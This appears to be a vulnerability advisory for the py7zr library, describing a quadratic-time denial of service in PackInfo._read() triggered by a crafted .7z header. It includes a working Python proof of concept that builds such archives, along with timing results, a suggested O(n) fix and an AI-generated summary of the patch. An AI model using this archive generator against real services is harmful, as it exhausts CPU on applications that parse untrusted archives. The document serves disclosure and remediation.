py7zr: O(n^2) algorithmic complexity DoS in PackInfo._read()
Description
Summary
PackInfo._read() computes cumulative pack positions with an O(n^2) summation, and the element count, numstreams, is read directly from the archive header. A crafted .7z archive with a large numstreams value causes excessive CPU consumption during SevenZipFile.__init__(); no extraction is needed. A 50 KB archive takes about 7 seconds of CPU time.
Details
The vulnerable code is in PackInfo._read() (archiveinfo.py):
self.packpositions = [sum(self.packsizes[:i]) for i in range(self.numstreams + 1)]
numstreams is parsed from the archive header via read_uint64() and is attacker-controlled. Each sum(self.packsizes[:i]) re-sums from the beginning, producing O(n^2) total work. This runs during header parsing in SevenZipFile.__init__(), before any extraction.
Suggested fix — replace with O(n) cumulative sum:
from itertools import accumulate
self.packpositions = [0] + list(accumulate(self.packsizes))
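As a quick sanity check, the sketch below compares the two expressions on a stand-alone list. The function names are illustrative and not part of py7zr, `packsizes` stands in for `self.packsizes`, and the sketch assumes `numstreams` equals `len(packsizes)`.

```python
from itertools import accumulate


def packpositions_quadratic(packsizes):
    # Same shape as the vulnerable expression: every prefix is re-summed from index 0.
    return [sum(packsizes[:i]) for i in range(len(packsizes) + 1)]


def packpositions_linear(packsizes):
    # Suggested replacement: a single running total carried forward by accumulate().
    return [0] + list(accumulate(packsizes))


sizes = [3, 1, 4, 1, 5]
print(packpositions_quadratic(sizes))  # [0, 3, 4, 8, 9, 14]
print(packpositions_linear(sizes))     # [0, 3, 4, 8, 9, 14]
```

Both functions return the same list, so the replacement should not change the parsed offsets; only the amount of work differs.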
PoC
import binascii
import io
import struct
import time

import py7zr
from py7zr.archiveinfo import write_uint64, PROPERTY

MAGIC = b'\x37\x7a\xbc\xaf\x27\x1c'


def encode_uint64(v):
    buf = io.BytesIO()
    write_uint64(buf, v)
    return buf.getvalue()


def build_7z_with_streams(numstreams):
    # Header holding only a PackInfo block that declares `numstreams` sizes of 1.
    header = io.BytesIO()
    header.write(PROPERTY.HEADER)
    header.write(PROPERTY.MAIN_STREAMS_INFO)
    header.write(PROPERTY.PACK_INFO)
    header.write(encode_uint64(0))
    header.write(encode_uint64(numstreams))
    header.write(PROPERTY.SIZE)
    for _ in range(numstreams):
        header.write(encode_uint64(1))
    header.write(PROPERTY.END)
    header.write(PROPERTY.END)
    header.write(PROPERTY.END)
    header_data = header.getvalue()

    # Signature header: magic, version, CRC of the start header, then the start header.
    out = io.BytesIO()
    out.write(MAGIC)
    out.write(b'\x00\x04')
    next_crc = binascii.crc32(header_data) & 0xFFFFFFFF
    start_header = (struct.pack('<Q', 0)
                    + struct.pack('<Q', len(header_data))
                    + struct.pack('<I', next_crc))
    out.write(struct.pack('<I', binascii.crc32(start_header) & 0xFFFFFFFF))
    out.write(start_header)
    out.write(header_data)
    return out.getvalue()


for n in [1000, 5000, 10000, 30000, 50000]:
    archive = build_7z_with_streams(n)
    start = time.time()
    try:
        with py7zr.SevenZipFile(io.BytesIO(archive), 'r') as z:
            pass
    except Exception:
        # The crafted archive may later raise due to being malformed,
        # but the quadratic work has already been performed during
        # header parsing in SevenZipFile.__init__().
        pass
    elapsed = time.time() - start
    print(f"n={n:6d} size={len(archive):8d} bytes time={elapsed:.3f}s")
Tested on py7zr 1.1.0, Python 3.12.3, Linux x86_64.
Results:
n=  1000 size=    1042 bytes time=0.004s
n=  5000 size=    5042 bytes time=0.071s
n= 10000 size=   10042 bytes time=0.291s
n= 30000 size=   30043 bytes time=2.609s
n= 50000 size=   50043 bytes time=7.097s
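The reported timings can be checked against the quadratic prediction. The sketch below uses only the figures from the results above: if run time grows as n^2, the ratio between two consecutive timings should be close to the square of the ratio of their n values.

```python
# (n, seconds) pairs copied from the results above.
results = [(1000, 0.004), (5000, 0.071), (10000, 0.291), (30000, 2.609), (50000, 7.097)]

ratios = []
for (n0, t0), (n1, t1) in zip(results, results[1:]):
    predicted = (n1 / n0) ** 2  # expected growth if cost is proportional to n^2
    observed = t1 / t0          # growth actually measured
    ratios.append((n0, n1, predicted, observed))
    print(f"{n0:>6} -> {n1:>6}: predicted x{predicted:.2f}, observed x{observed:.2f}")
```

The smallest measurement (0.004 s) is close to timer resolution, so the first ratio is the least reliable. The remaining three ratios stay within a few percent of the quadratic prediction.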
Impact
Denial of Service. Any application that opens .7z archives from untrusted sources using py7zr.SevenZipFile() can be caused to consume excessive CPU time with a small crafted archive. The quadratic cost occurs during header parsing, before any content extraction.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability mechanics
Root cause
"Missing input validation on `numstreams` combined with an O(n²) cumulative sum computation in `PackInfo._read()` allows an attacker to cause excessive CPU consumption via a crafted archive header."
Attack vector
An attacker crafts a small .7z archive with a large `numstreams` value in the PackInfo header. When a victim application opens the archive via `py7zr.SevenZipFile()`, the quadratic `packpositions` computation consumes excessive CPU time — a 50 KB archive causes ~7 seconds of CPU usage [ref_id=1]. No extraction is required; the cost is incurred during header parsing alone.
Affected code
The vulnerability is in `PackInfo._read()` in `py7zr/archiveinfo.py`. The line `self.packpositions = [sum(self.packsizes[:i]) for i in range(self.numstreams + 1)]` recomputes the cumulative sum from scratch for each index, producing O(n²) work. This runs during `SevenZipFile.__init__()` header parsing, before any extraction.
What the fix does
The patch [patch_id=6634785] makes two changes. First, it adds a `MAX_NUMSTREAMS = 65536` constant and a validation check that raises `Bad7zFile` if `numstreams` exceeds this limit, preventing the attacker from specifying arbitrarily large values. Second, it replaces the O(n²) list comprehension with `list(accumulate(self.packsizes, initial=0))`, which computes the cumulative sum in O(n) time using `itertools.accumulate`.
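A minimal sketch of the two changes described above, written as a stand-alone function and not taken from the actual patch. `MAX_NUMSTREAMS` and `Bad7zFile` are named in the description; the function name, its signature, the error message, and the local `Bad7zFile` stand-in class are assumptions for illustration.

```python
from itertools import accumulate

MAX_NUMSTREAMS = 65536  # limit named in the patch description


class Bad7zFile(Exception):
    """Local stand-in so the sketch runs without py7zr installed."""


def compute_packpositions(numstreams, packsizes):
    # Hypothetical helper: reject oversized counts before any per-stream work.
    if numstreams > MAX_NUMSTREAMS:
        raise Bad7zFile(f"numstreams {numstreams} exceeds limit {MAX_NUMSTREAMS}")
    # Linear-time running total; initial=0 supplies the leading zero offset.
    return list(accumulate(packsizes, initial=0))


print(compute_packpositions(3, [10, 20, 30]))  # [0, 10, 30, 60]
```

The `initial` keyword of `itertools.accumulate` requires Python 3.8 or later. Checking the count before building the list means a rejected archive costs only the comparison.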
Preconditions
- input: The victim must open a crafted .7z archive using `py7zr.SevenZipFile()`
- auth: No authentication or special privileges required; the archive can be supplied by any untrusted source
Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.